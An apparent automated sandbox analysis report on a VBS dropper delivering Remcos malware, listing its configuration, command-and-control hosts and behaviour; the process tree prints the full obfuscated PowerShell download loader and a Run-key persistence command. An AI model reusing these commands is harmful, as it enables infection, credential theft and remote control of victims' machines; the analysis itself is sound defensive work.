Analysis
-
max time kernel
149s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
02-12-2024 14:25
Static task
static1
Behavioral task
behavioral1
Sample
doc02122024782020031808174KR1802122024_po_doc_00000(991KB).vbs
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
doc02122024782020031808174KR1802122024_po_doc_00000(991KB).vbs
Resource
win10v2004-20241007-en
General
-
Target
doc02122024782020031808174KR1802122024_po_doc_00000(991KB).vbs
-
Size
28KB
-
MD5
3f1b162cde8a052e2743f254ad97c590
-
SHA1
8263313c9ed96a36a57d67dfb72fa9729a2e792b
-
SHA256
06d4a6631cc392070dc01e7bc97e333bd61af14ecf60bfc492e2a585f56daa22
-
SHA512
447eb019fb70be017ad0fe0f1c88a467fd02ebac9647ac12a0dcd2ef8ddea223e6a3bf9e3c395d88839926638f6a0d8cce547bdf6a8a4b4349260c85c22e8416
-
SSDEEP
384:M5cVCJUAGNvubdgdgrBRUmngkIgjpFsQF9Oq1ymBRhdzsxPc0+:M5cXLNvuby2LUmngzgjpimOq1dQxA
Malware Config
Extracted
remcos
A$ian
iwarsut775laudryed1.duckdns.org:57484
iwarsut775laudryed1.duckdns.org:57483
iwarsut775laudryed2.duckdns.org:57484
iwarsut775laudryed3.duckdns.org:57484
-
audio_folder
MicRecords
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
remcos.exe
-
copy_folder
Remcos
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
true
-
install_flag
false
-
keylog_crypt
false
-
keylog_file
hmbnspt.dat
-
keylog_flag
false
-
keylog_path
%AppData%
-
mouse_option
false
-
mutex
shibuetgtst-WMSLPY
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
- startup_value
-
take_screenshot_option
false
-
take_screenshot_time
5
Signatures
-
Remcos family
-
Detected Nirsoft tools 3 IoCs
Free utilities often used by attackers which can steal passwords, product keys, etc.
resource yara_rule behavioral2/memory/1964-67-0x0000000000400000-0x0000000000462000-memory.dmp Nirsoft behavioral2/memory/3120-69-0x0000000000400000-0x0000000000424000-memory.dmp Nirsoft behavioral2/memory/940-66-0x0000000000400000-0x0000000000478000-memory.dmp Nirsoft -
NirSoft MailPassView 1 IoCs
Password recovery tool for various email clients
resource yara_rule behavioral2/memory/1964-67-0x0000000000400000-0x0000000000462000-memory.dmp MailPassView -
NirSoft WebBrowserPassView 1 IoCs
Password recovery tool for various web browsers
resource yara_rule behavioral2/memory/940-66-0x0000000000400000-0x0000000000478000-memory.dmp WebBrowserPassView -
Blocklisted process makes network request 7 IoCs
flow pid Process 3 4536 WScript.exe 8 4528 powershell.exe 24 1516 msiexec.exe 27 1516 msiexec.exe 31 1516 msiexec.exe 33 1516 msiexec.exe 34 1516 msiexec.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation WScript.exe -
Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts msiexec.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Strudsmavers = "%Barcelona% -windowstyle 1 $Nedtllingen=(gp -Path 'HKCU:\\Software\\Firmity\\').Isbjergets;%Barcelona% ($Nedtllingen)" reg.exe -
pid Process 4528 powershell.exe 1472 powershell.exe -
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
pid Process 1516 msiexec.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 1472 powershell.exe 1516 msiexec.exe -
Suspicious use of SetThreadContext 3 IoCs
description pid Process procid_target PID 1516 set thread context of 940 1516 msiexec.exe 97 PID 1516 set thread context of 1964 1516 msiexec.exe 98 PID 1516 set thread context of 3120 1516 msiexec.exe 99 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 7 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe -
Modifies registry key 1 TTPs 1 IoCs
pid Process 4920 reg.exe -
Suspicious behavior: EnumeratesProcesses 11 IoCs
pid Process 4528 powershell.exe 4528 powershell.exe 1472 powershell.exe 1472 powershell.exe 1472 powershell.exe 3120 msiexec.exe 3120 msiexec.exe 940 msiexec.exe 940 msiexec.exe 940 msiexec.exe 940 msiexec.exe -
Suspicious behavior: MapViewOfSection 4 IoCs
pid Process 1472 powershell.exe 1516 msiexec.exe 1516 msiexec.exe 1516 msiexec.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 4528 powershell.exe Token: SeDebugPrivilege 1472 powershell.exe Token: SeDebugPrivilege 3120 msiexec.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 1516 msiexec.exe -
Suspicious use of WriteProcessMemory 24 IoCs
description pid Process procid_target PID 4536 wrote to memory of 4528 4536 WScript.exe 82 PID 4536 wrote to memory of 4528 4536 WScript.exe 82 PID 1472 wrote to memory of 1516 1472 powershell.exe 91 PID 1472 wrote to memory of 1516 1472 powershell.exe 91 PID 1472 wrote to memory of 1516 1472 powershell.exe 91 PID 1472 wrote to memory of 1516 1472 powershell.exe 91 PID 1516 wrote to memory of 2112 1516 msiexec.exe 94 PID 1516 wrote to memory of 2112 1516 msiexec.exe 94 PID 1516 wrote to memory of 2112 1516 msiexec.exe 94 PID 2112 wrote to memory of 4920 2112 cmd.exe 96 PID 2112 wrote to memory of 4920 2112 cmd.exe 96 PID 2112 wrote to memory of 4920 2112 cmd.exe 96 PID 1516 wrote to memory of 940 1516 msiexec.exe 97 PID 1516 wrote to memory of 940 1516 msiexec.exe 97 PID 1516 wrote to memory of 940 1516 msiexec.exe 97 PID 1516 wrote to memory of 940 1516 msiexec.exe 97 PID 1516 wrote to memory of 1964 1516 msiexec.exe 98 PID 1516 wrote to memory of 1964 1516 msiexec.exe 98 PID 1516 wrote to memory of 1964 1516 msiexec.exe 98 PID 1516 wrote to memory of 1964 1516 msiexec.exe 98 PID 1516 wrote to memory of 3120 1516 msiexec.exe 99 PID 1516 wrote to memory of 3120 1516 msiexec.exe 99 PID 1516 wrote to memory of 3120 1516 msiexec.exe 99 PID 1516 wrote to memory of 3120 1516 msiexec.exe 99
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\doc02122024782020031808174KR1802122024_po_doc_00000(991KB).vbs"1⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4536 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$Upbuild='Termometrisk';;$Litteraer='ridtenes';;$Huggedes='Boghvedegrynet';;$Eliger='Idolastre';;$Warps=$host.Name;function Pickover($Receded){If ($Warps) {$Uddelegeringernes=5} for ($Stuearrester=$Uddelegeringernes;;$Stuearrester+=6){if(!$Receded[$Stuearrester]) { break };$melitas+=$Receded[$Stuearrester];$Fordum='Philatelists'}$melitas}function Semra($clamatory){ .($Tsningens229) ($clamatory)}$Karakterfastes=Pickover ' Sko.N tus EUdko,T.lzev.Bi lew';$Karakterfastes+=Pickover 'Sor iEShellBfeje CCyprilUnderi moneeInqu.n DasyT';$Legegades149=Pickover 'Etat MIronboIldrazverdeiUnl,clMemenlDemera orte/';$opgavesamlingens=Pickover 'RefleTGrainlunders Di l1Overs2';$Nonemphatic='Shedm[Cumarn itulEOpma.tBasid. TranSE hjoePaaterNur avcop aiUnmanC SelveFran,PAyudaO ,njeImartiNForret SpalmUnadma R neN Ove AElfmugSa meeFo,riRMu.ro] aars:Inqui:UddelS SyslESkid,CHaid.UEuropRNagaii VandTOpdraYPrevePCadweRHemopo Fa.kTSiphoO etacResulo F.rlLLands=Klima$Chec.OJazzbpUnfouGMallaADavidVStoreeLiqu SFjerdAAmb.sMHandlLbrobaiPouldn Ex eg,mbroeSub.eNLoss S';$Legegades149+=Pickover 'Kajpl5 P.ac.ant n0Erhve tr he( esoWoversiHok,un Forud ,ospoWienewOverfsKomm, UvuloN KalcTLdrep Spach1Unp e0Indta. Eiri0ha,rd;Thal EpaulW ForbiUnicanni,ku6 Timg4Alamo;Stili ActinxHypoc6 Thor4Nazar;Mouto SchmarunthwvExpat:trill1terpe3ur em1Spots.Optag0Ana r)Repre omiG Em ee A ktcSnapskH gumoH mme/Manic2P.odd0capp 1Reint0Gysel0Loxod1 Mana0Fossi1Mysti UdskeFlabyriBrudar UndueErektf sello efamxCockn/ Afsp1Jebat3Jeaab1k,ken.Klikk0';$Underklasse=Pickover ' ,ediUChurcST.aisE Tri R tr.l- abenaOle,ngexscuETmmern U lst';$Interassociate111=Pickover ' Sndeh Litet PynttErri p F.jlsResc.: Fdse/a ien/Rebu gGeninaTr,ubrInddeh rabaoLovovuIsengdMisopjAchenoUnscouUnfrarSilvemLaane.FandacAfreno forgmInti /surm KHldekeRedeby Tran1 Stor.GaspipJ,rrynprea,gGirin>TambuhOver.tplositHalshpForsisUnpar:Plura/Yvern/Flyveg TofraOplrirHldeshP rfuoEksp uSlgsudHe.erjInfluo KnapuKridtrBlaammKur uoSmertn EfteeRddel.Tak.dcFor,doSkrddmkenel/ DrifK eeshe Forlyme ap1Tsume.WitjapPedo nBaggrg';$Stred=Pickover ' Brnd>';$Tsningens229=Pickover 'OryssIMahzoEStrejX';$Kejsersnit235='Tragicly';$Pubbens='\Glacialtid.Ses';Semra (Pickover ' Stim$ GuesGDobbwlLe teOEl,ndBEdomia UnfrLUnben:Le svTPre tIElopelCultifO.dfoLCorsayuklogT,iplonDryssiGu dtnSmmo.gCostuEDdsdrrKerneS opde= Poli$P,side FormnCalumvIrrat:WangaaRetu,p,nkekpVul,aDHasseaSpeaktUdtola,ordv+bismu$ A buppopp UBedu bSubteBSpildECerylnHje ts');Semra (Pickover ' Elec$AdresGflyboLOmkomO MarrB RolaAMor ilAnt h:Hieroh DoppOParanmAnchooGavagnP,equUstrawcBefstL paedeWelteA micrrHeavy=Tr ke$OplgnIBimanN .ibet ummae Afsvr Varea N tisVi,ers ummeoVib aCUnquoI lectABoli.tNatalef.tes1Dingo1 anuk1 Cata. I dgsEmbarP SubdlIneliiPowniTMel n(Knoen$SagsaSskuretUdskrRNecroEBi.chDTrold)');Semra (Pickover $Nonemphatic);$Interassociate111=$Homonuclear[0];$ajlen=(Pickover 'Bi pe$BallaGTvineLMenn ODeltiBK okuA.mnitlDiplo:KleskRNonc ENesogKOs ilL vaasa lagtMBe rveBa.samDe okSOverrS Hic IGe,brg ntip1 Ddsb3Papis7vider=SynkrNOpe hECheekW,apan-SjaskoAandsbZonitJ tveEBlis,cNinictJordv NewfaS S eeyskovlSAlantTProbaESubstM.ljma.Certi$TinglKRede A co.nrHerboAAir hkSki stConusEKo.poRDiakrfOlit,asprinsPeripTProstechiffS');Semra ($ajlen);Semra (Pickover ' pol,$MutedRComprePuddekUnbrelSup aa A temBoghaeTehanm decksBentis Whe iFyri,gPrahu1 Meso3 L.mp7Terra.Maho,HReseceMetemaEncrid .obbeSyntar lassCe,eb[M tte$Bru tUKollanNons,dS.agse Be,vrJaquek akelStofpaSlutss ResesAutope Male]P.ehe=Ps ch$ TigeLUnp oeRel pgLaticeNatbogUdpinaMousedAur.se xocosOnoma1Antim4 ube9');$Consonantness=Pickover 'Misha$ HaanRDe,ome Res kBravel Par,aUndermBiproeResismcaus sBack s eedli OffigS rai1Doras3 Wa t7Udl n.HaglbD CarboDaggewSystenInkb lDambroSamk,aSlaugd ramFL.theiformulOv rseFe sk(Upass$Aflo.I skadnP ugutSp aeeBulldr eaca racs gudesSangsoC,mpicSval iPar.maPajamtfor veO.fic1,ngil1Pa ms1 Nonr,Spgel$HomeoSFirdoagtzplkAgramsTovr eDetrasHematp N geaPhlebrOverskBewite ,ilmtT les3Dagse4T lsv)';$Saksesparket34=$Tilflytningers;Semra (Pickover 'Un ns$ UdtaGFempelOutspOAdjudBBronzA,nstrl.itup: RelaPStroguFi.moRMeagevKonceE.lposyDesse=Potla(RenonTRedivENonmaSS lvstKaesk-Ge tip ,ockADecylt itwohHusbl Komme$u,eldsHj mlAProfekEn ersKen teRid.es StrepBim laEmaljRVowelkM lieEwe,nlTM ter3 defi4Ba,ta)');while (!$Purvey) {Semra (Pickover 'Pan l$nonp,gUnballMuld.o AfvrbcricoaSekunlKalci:oprinG.arageFo osnDdelinShilleIb remAutopl.ncatyEtym sNaturn uberi ChemnSkamfgUdkrae Pseun.insas Over= Re b$SkulpAC.nfefGreevtLaanevLineatHunchnPyramiTrumfnstyrvg KdebePhotor rekln.addee') ;Semra $Consonantness;Semra (Pickover 'ModulsEksisTTude a efutROutbrtSquir-Ro anSdinoplGnavpeduemoESubcepNr st Cov.4');Semra (Pickover 'Wigg $ EterGR synL BorgO P rlbBetr.ALymphLD.rze: AuguPSkjoluMi,ikRDiverVshi,teItineyFre m=Masse( tut t DiffE,axidS .nnettidde- juleP PoinA albot Ha rHSkole L el$Bygevs JubeAtitlekTurris MarsEB nziS alacp irgiaNellir S.uikMinuseVanddtPrate3unenj4Tandy)') ;Semra (Pickover ' gnin$ForklGOv,rel CommoUdmaabVdet.A rampl An p:E,pirbGryrkADopinACou tdGesjfEEpigoHIn eraOwsenVSurconVingeSparon=Frea $UnpergRemnflJo dsOSlam bKontraBeskrLMilio: KonvKbonnwuLyne nYer tsGastot omplMClinoA llusLreache GuerRFunktePremenAucheSPret,+ stic+ gamo%Smask$ Na lH U,grOjetmomT dspo SmitnGaudeU DelacSubcolCe leePredeA A,toR Inte.SleepcLykk,oAgterU St.nnPari.t') ;$Interassociate111=$Homonuclear[$Baadehavns]}$Onaner=289582;$Nedstreg=31752;Semra (Pickover 'Succe$UttergUnposlRegnsOMatteB NonsaPeturlLarge:DiuremmessiyBel sRForblIRat rC HypoaM,yers.ostb Athei=Trist T.rnigM nkseWil.ltproje-CroisCStudeO PastnplaniTSecsre omern HvesTAfslu Remin$remiss SkenaSwipeKBanegSAttenE OplysSkatePDisenAGrindRCyanuk DeflE Sak tSel k3zestf4');Semra (Pickover 'Co la$his og CabblCompaopathob OveraMidlal.ever:Hija IBrugemKalifmKun taHeternScenee ocianFi kec ElefeAnako1Dy ph3Arnab7,hara i.dis=Skrmt Slave[PuggaSRerumy T.ucsOveretGyneceReaktm Dipn. O,isCFox hoOdifenDejlivRi gkeFeltarItacit Tros]Dippe:Hemih: Cap F SocirT rryoforkym SyndBProscaDummesElekte abar6Renny4RecipSEffert.asrerartisi pisnapoqug Invo(.istr$OverbM s inyRoularDanneiAntiec BeniaA riesDelkr)');Semra (Pickover 'Anden$RanglgStranLSawhooQualiBBlaykaUnd.sLDefau:Pela TCyanirki,niFRefleNK.rociWishenWellhg,nflaEFjerpr LevnnNikkeETilpasPremu Unine=Vende Dicyc[Sk,ttSOscilY H peS S ovtScorieHal,bmComme.Tanket.nockESennex,emont.acho. DmtiEFermanE iasc EyedOSkrteDUfolkIUpstaNKostugSw nd]Blimp: akti:UngenAco.esSMilksCBedsoiGrav ID.eng. g utGM,sune IrlatLaxats,artnTorganRVedliI LserNF.agtg Spig(Salna$opslaIJa goMYd.rgMElendA CardNRimelEOverlNO ersC R spEBehan1Tilsy3Refin7Mikro)');Semra (Pickover 'Unad.$Led rGidri LAfs yO ontobPositAIro iLUdlad:MagerLAncese OutdVSk,lnIste ttUdloeyDever=Kterr$ Ele.tMa.herVeneyfDest NRhombI CandnMull GEdiyaeAtropRLilesN .hroEKvletsKomma.DynenSSowtbUCa,elb SpheS ,looTSpri.rNonaiIr kogNSammeGUnder(Efter$Nre dOBeskinBa kka FrasnLagopeFestrRUninf,Stjer$Ter anDischeGrnttD RumssAnettTcalycr untoEAf eaGKadmi)');Semra $Levity;"2⤵
- Blocklisted process makes network request
- Network Service Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4528
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" ";$Upbuild='Termometrisk';;$Litteraer='ridtenes';;$Huggedes='Boghvedegrynet';;$Eliger='Idolastre';;$Warps=$host.Name;function Pickover($Receded){If ($Warps) {$Uddelegeringernes=5} for ($Stuearrester=$Uddelegeringernes;;$Stuearrester+=6){if(!$Receded[$Stuearrester]) { break };$melitas+=$Receded[$Stuearrester];$Fordum='Philatelists'}$melitas}function Semra($clamatory){ .($Tsningens229) ($clamatory)}$Karakterfastes=Pickover ' Sko.N tus EUdko,T.lzev.Bi lew';$Karakterfastes+=Pickover 'Sor iEShellBfeje CCyprilUnderi moneeInqu.n DasyT';$Legegades149=Pickover 'Etat MIronboIldrazverdeiUnl,clMemenlDemera orte/';$opgavesamlingens=Pickover 'RefleTGrainlunders Di l1Overs2';$Nonemphatic='Shedm[Cumarn itulEOpma.tBasid. TranSE hjoePaaterNur avcop aiUnmanC SelveFran,PAyudaO ,njeImartiNForret SpalmUnadma R neN Ove AElfmugSa meeFo,riRMu.ro] aars:Inqui:UddelS SyslESkid,CHaid.UEuropRNagaii VandTOpdraYPrevePCadweRHemopo Fa.kTSiphoO etacResulo F.rlLLands=Klima$Chec.OJazzbpUnfouGMallaADavidVStoreeLiqu SFjerdAAmb.sMHandlLbrobaiPouldn Ex eg,mbroeSub.eNLoss S';$Legegades149+=Pickover 'Kajpl5 P.ac.ant n0Erhve tr he( esoWoversiHok,un Forud ,ospoWienewOverfsKomm, UvuloN KalcTLdrep Spach1Unp e0Indta. Eiri0ha,rd;Thal EpaulW ForbiUnicanni,ku6 Timg4Alamo;Stili ActinxHypoc6 Thor4Nazar;Mouto SchmarunthwvExpat:trill1terpe3ur em1Spots.Optag0Ana r)Repre omiG Em ee A ktcSnapskH gumoH mme/Manic2P.odd0capp 1Reint0Gysel0Loxod1 Mana0Fossi1Mysti UdskeFlabyriBrudar UndueErektf sello efamxCockn/ Afsp1Jebat3Jeaab1k,ken.Klikk0';$Underklasse=Pickover ' ,ediUChurcST.aisE Tri R tr.l- abenaOle,ngexscuETmmern U lst';$Interassociate111=Pickover ' Sndeh Litet PynttErri p F.jlsResc.: Fdse/a ien/Rebu gGeninaTr,ubrInddeh rabaoLovovuIsengdMisopjAchenoUnscouUnfrarSilvemLaane.FandacAfreno forgmInti /surm KHldekeRedeby Tran1 Stor.GaspipJ,rrynprea,gGirin>TambuhOver.tplositHalshpForsisUnpar:Plura/Yvern/Flyveg TofraOplrirHldeshP rfuoEksp uSlgsudHe.erjInfluo KnapuKridtrBlaammKur uoSmertn EfteeRddel.Tak.dcFor,doSkrddmkenel/ DrifK eeshe Forlyme ap1Tsume.WitjapPedo nBaggrg';$Stred=Pickover ' Brnd>';$Tsningens229=Pickover 'OryssIMahzoEStrejX';$Kejsersnit235='Tragicly';$Pubbens='\Glacialtid.Ses';Semra (Pickover ' Stim$ GuesGDobbwlLe teOEl,ndBEdomia UnfrLUnben:Le svTPre tIElopelCultifO.dfoLCorsayuklogT,iplonDryssiGu dtnSmmo.gCostuEDdsdrrKerneS opde= Poli$P,side FormnCalumvIrrat:WangaaRetu,p,nkekpVul,aDHasseaSpeaktUdtola,ordv+bismu$ A buppopp UBedu bSubteBSpildECerylnHje ts');Semra (Pickover ' Elec$AdresGflyboLOmkomO MarrB RolaAMor ilAnt h:Hieroh DoppOParanmAnchooGavagnP,equUstrawcBefstL paedeWelteA micrrHeavy=Tr ke$OplgnIBimanN .ibet ummae Afsvr Varea N tisVi,ers ummeoVib aCUnquoI lectABoli.tNatalef.tes1Dingo1 anuk1 Cata. I dgsEmbarP SubdlIneliiPowniTMel n(Knoen$SagsaSskuretUdskrRNecroEBi.chDTrold)');Semra (Pickover $Nonemphatic);$Interassociate111=$Homonuclear[0];$ajlen=(Pickover 'Bi pe$BallaGTvineLMenn ODeltiBK okuA.mnitlDiplo:KleskRNonc ENesogKOs ilL vaasa lagtMBe rveBa.samDe okSOverrS Hic IGe,brg ntip1 Ddsb3Papis7vider=SynkrNOpe hECheekW,apan-SjaskoAandsbZonitJ tveEBlis,cNinictJordv NewfaS S eeyskovlSAlantTProbaESubstM.ljma.Certi$TinglKRede A co.nrHerboAAir hkSki stConusEKo.poRDiakrfOlit,asprinsPeripTProstechiffS');Semra ($ajlen);Semra (Pickover ' pol,$MutedRComprePuddekUnbrelSup aa A temBoghaeTehanm decksBentis Whe iFyri,gPrahu1 Meso3 L.mp7Terra.Maho,HReseceMetemaEncrid .obbeSyntar lassCe,eb[M tte$Bru tUKollanNons,dS.agse Be,vrJaquek akelStofpaSlutss ResesAutope Male]P.ehe=Ps ch$ TigeLUnp oeRel pgLaticeNatbogUdpinaMousedAur.se xocosOnoma1Antim4 ube9');$Consonantness=Pickover 'Misha$ HaanRDe,ome Res kBravel Par,aUndermBiproeResismcaus sBack s eedli OffigS rai1Doras3 Wa t7Udl n.HaglbD CarboDaggewSystenInkb lDambroSamk,aSlaugd ramFL.theiformulOv rseFe sk(Upass$Aflo.I skadnP ugutSp aeeBulldr eaca racs gudesSangsoC,mpicSval iPar.maPajamtfor veO.fic1,ngil1Pa ms1 Nonr,Spgel$HomeoSFirdoagtzplkAgramsTovr eDetrasHematp N geaPhlebrOverskBewite ,ilmtT les3Dagse4T lsv)';$Saksesparket34=$Tilflytningers;Semra (Pickover 'Un ns$ UdtaGFempelOutspOAdjudBBronzA,nstrl.itup: RelaPStroguFi.moRMeagevKonceE.lposyDesse=Potla(RenonTRedivENonmaSS lvstKaesk-Ge tip ,ockADecylt itwohHusbl Komme$u,eldsHj mlAProfekEn ersKen teRid.es StrepBim laEmaljRVowelkM lieEwe,nlTM ter3 defi4Ba,ta)');while (!$Purvey) {Semra (Pickover 'Pan l$nonp,gUnballMuld.o AfvrbcricoaSekunlKalci:oprinG.arageFo osnDdelinShilleIb remAutopl.ncatyEtym sNaturn uberi ChemnSkamfgUdkrae Pseun.insas Over= Re b$SkulpAC.nfefGreevtLaanevLineatHunchnPyramiTrumfnstyrvg KdebePhotor rekln.addee') ;Semra $Consonantness;Semra (Pickover 'ModulsEksisTTude a efutROutbrtSquir-Ro anSdinoplGnavpeduemoESubcepNr st Cov.4');Semra (Pickover 'Wigg $ EterGR synL BorgO P rlbBetr.ALymphLD.rze: AuguPSkjoluMi,ikRDiverVshi,teItineyFre m=Masse( tut t DiffE,axidS .nnettidde- juleP PoinA albot Ha rHSkole L el$Bygevs JubeAtitlekTurris MarsEB nziS alacp irgiaNellir S.uikMinuseVanddtPrate3unenj4Tandy)') ;Semra (Pickover ' gnin$ForklGOv,rel CommoUdmaabVdet.A rampl An p:E,pirbGryrkADopinACou tdGesjfEEpigoHIn eraOwsenVSurconVingeSparon=Frea $UnpergRemnflJo dsOSlam bKontraBeskrLMilio: KonvKbonnwuLyne nYer tsGastot omplMClinoA llusLreache GuerRFunktePremenAucheSPret,+ stic+ gamo%Smask$ Na lH U,grOjetmomT dspo SmitnGaudeU DelacSubcolCe leePredeA A,toR Inte.SleepcLykk,oAgterU St.nnPari.t') ;$Interassociate111=$Homonuclear[$Baadehavns]}$Onaner=289582;$Nedstreg=31752;Semra (Pickover 'Succe$UttergUnposlRegnsOMatteB NonsaPeturlLarge:DiuremmessiyBel sRForblIRat rC HypoaM,yers.ostb Athei=Trist T.rnigM nkseWil.ltproje-CroisCStudeO PastnplaniTSecsre omern HvesTAfslu Remin$remiss SkenaSwipeKBanegSAttenE OplysSkatePDisenAGrindRCyanuk DeflE Sak tSel k3zestf4');Semra (Pickover 'Co la$his og CabblCompaopathob OveraMidlal.ever:Hija IBrugemKalifmKun taHeternScenee ocianFi kec ElefeAnako1Dy ph3Arnab7,hara i.dis=Skrmt Slave[PuggaSRerumy T.ucsOveretGyneceReaktm Dipn. O,isCFox hoOdifenDejlivRi gkeFeltarItacit Tros]Dippe:Hemih: Cap F SocirT rryoforkym SyndBProscaDummesElekte abar6Renny4RecipSEffert.asrerartisi pisnapoqug Invo(.istr$OverbM s inyRoularDanneiAntiec BeniaA riesDelkr)');Semra (Pickover 'Anden$RanglgStranLSawhooQualiBBlaykaUnd.sLDefau:Pela TCyanirki,niFRefleNK.rociWishenWellhg,nflaEFjerpr LevnnNikkeETilpasPremu Unine=Vende Dicyc[Sk,ttSOscilY H peS S ovtScorieHal,bmComme.Tanket.nockESennex,emont.acho. DmtiEFermanE iasc EyedOSkrteDUfolkIUpstaNKostugSw nd]Blimp: akti:UngenAco.esSMilksCBedsoiGrav ID.eng. g utGM,sune IrlatLaxats,artnTorganRVedliI LserNF.agtg Spig(Salna$opslaIJa goMYd.rgMElendA CardNRimelEOverlNO ersC R spEBehan1Tilsy3Refin7Mikro)');Semra (Pickover 'Unad.$Led rGidri LAfs yO ontobPositAIro iLUdlad:MagerLAncese OutdVSk,lnIste ttUdloeyDever=Kterr$ Ele.tMa.herVeneyfDest NRhombI CandnMull GEdiyaeAtropRLilesN .hroEKvletsKomma.DynenSSowtbUCa,elb SpheS ,looTSpri.rNonaiIr kogNSammeGUnder(Efter$Nre dOBeskinBa kka FrasnLagopeFestrRUninf,Stjer$Ter anDischeGrnttD RumssAnettTcalycr untoEAf eaGKadmi)');Semra $Levity;"1⤵
- Network Service Discovery
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1472 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\SysWOW64\msiexec.exe"2⤵
- Blocklisted process makes network request
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1516 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Strudsmavers" /t REG_EXPAND_SZ /d "%Barcelona% -windowstyle 1 $Nedtllingen=(gp -Path 'HKCU:\Software\Firmity\').Isbjergets;%Barcelona% ($Nedtllingen)"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2112 -
C:\Windows\SysWOW64\reg.exeREG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Strudsmavers" /t REG_EXPAND_SZ /d "%Barcelona% -windowstyle 1 $Nedtllingen=(gp -Path 'HKCU:\Software\Firmity\').Isbjergets;%Barcelona% ($Nedtllingen)"4⤵
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Modifies registry key
PID:4920
-
-
-
C:\Windows\SysWOW64\msiexec.exeC:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\lqaoqch"3⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:940
-
-
C:\Windows\SysWOW64\msiexec.exeC:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\otggrvsujxr"3⤵
- Accesses Microsoft Outlook accounts
- System Location Discovery: System Language Discovery
PID:1964
-
-
C:\Windows\SysWOW64\msiexec.exeC:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\ynlrsndoffjzdg"3⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3120
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5d4ff23c124ae23955d34ae2a7306099a
SHA1b814e3331a09a27acfcd114d0c8fcb07957940a3
SHA2561de6cfd5e02c052e3475d33793b6a150b2dd6eebbf0aa3e4c8e4e2394a240a87
SHA512f447a6042714ae99571014af14bca9d87ede59af68a0fa1d880019e9f1aa41af8cbf9c08b0fea2ccb7caa48165a75825187996ea6939ee8370afa33c9f809e79
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
4KB
MD557509a6a6267f17bef5e5da8b1df8829
